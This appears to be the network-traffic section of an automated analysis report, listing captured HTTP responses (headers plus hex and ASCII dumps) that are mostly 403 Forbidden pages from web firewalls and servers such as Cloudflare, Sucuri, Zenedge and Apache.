                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveDate: Thu, 27 Jul 2023 19:53:23 GMTX-Cache-Status: Cache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0X-Zen-Fury: aad9e4056cd37c007c18736facf56b1be070588dServer: ZENEDGEData Raw: 32 61 38 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 34 37 22 2c 20 31 36 39 30 34 38 37 35 34 38 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 76 61 72 20 76 20 3d 20 31 36 39 30 34 38 37 35 34 38 20 2a 20 33 2e 31 34 31 35 39 32 36 35 33 35 38 39 38 3b 20 76 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 76 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 5f 5f 7a 6a 63 39 39 36 34 3d 22 2b 76 2b 22 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 37 20 4a 75 6c 20 32 30 32 33 20 31 39 3a 35 35 3a 32 33 20 55 54 43 3b 20 70 61 74 68 3d 2f 22 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2a8<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC47", 1690487548, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script><script>(function () { var v = 1690487548 * 3.1415926535898; v = Math.floor(v); document.c
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Thu, 27 Jul 2023 19:53:13 GMTData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:25 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:25 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:53:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=18X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 589b6729-3e77-443d-9e6b-5277c5a9695eCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=a5RWam9Pln4swHglxL6PzouX3MDnyFTxG6IQc01y8OmYlRRulu74QJZ9aPTLFnG5nc1HltVvIfsvJto8Ftf5dVH7pbpv9A0ENAyb08ZUVJAtIdNxt%2Ffo3QSpC2bAy%2FI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=151.000023Server: cloudflareCF-RAY: 7ed76db41e0e91d1-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:27 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dLRp34U7nUX0t0IXdeP4KrR49bkm%2BNDyhsc6acjDaqK94%2B%2F8mI075ewEMSjQ%2Br6it0%2Fim4cfb22OFvmp%2BjQpGaWrq2o%2ByE80N%2BrAz99qUpT8aZJKwWHoOpt0XvtRjOM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76dbc7ccd9170-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:27 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8c8lO9Pdm39tFjTm6PjH5yLzcC7lLR7Px%2FT6QSRjms5HinKHbersicwxZryrVm6oa9YszXQiBD8YeDjrzcZ%2BFPZurVJzAqHv4xh4ccj8r4w2gz4QWwJpnTNzkupy8BE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76dbcfd809170-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:30 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KnKnblF37SlJozE30xU6wvpNFwCBwtMamxkSw%2FuJCHVg0vPVQRMjGshiPLoLHaAkj4oq3e4YCsv%2BqLbv5HNTfg1n09d%2Fr1ueMsECsy%2Bolo%2BsRskdv1iTP9ugkhSCH8xa"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76dcc7c8bbb35-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:30 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VDVvI55luxNIE670XTCVvPOUqF1n2gnn4tG2%2BbFR0iGDAljFWXhcChY8v8Kjonjiy6bHiADMcgpwWWUh3a2EsAQZqHQKGLHO7duqMJekkEF1SC6AO1c%2FP6ujwJ4kjWYf"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76dcd8e05bb35-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Thu, 27 Jul 2023 19:53:33 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=BVYXHTAFe1DeMmQ3ZTE2MDgxN2E1OTI1MGQyZWY3MTYyNDBmMzU5;Path=/X-Contextid: OS1GEehm/5qWtdC5RData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Thu, 27 Jul 2023 19:53:33 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15003X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 63 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:33 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openresty/1.15.8.2Date: Thu, 27 Jul 2023 19:53:33 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.15.8.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:34 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 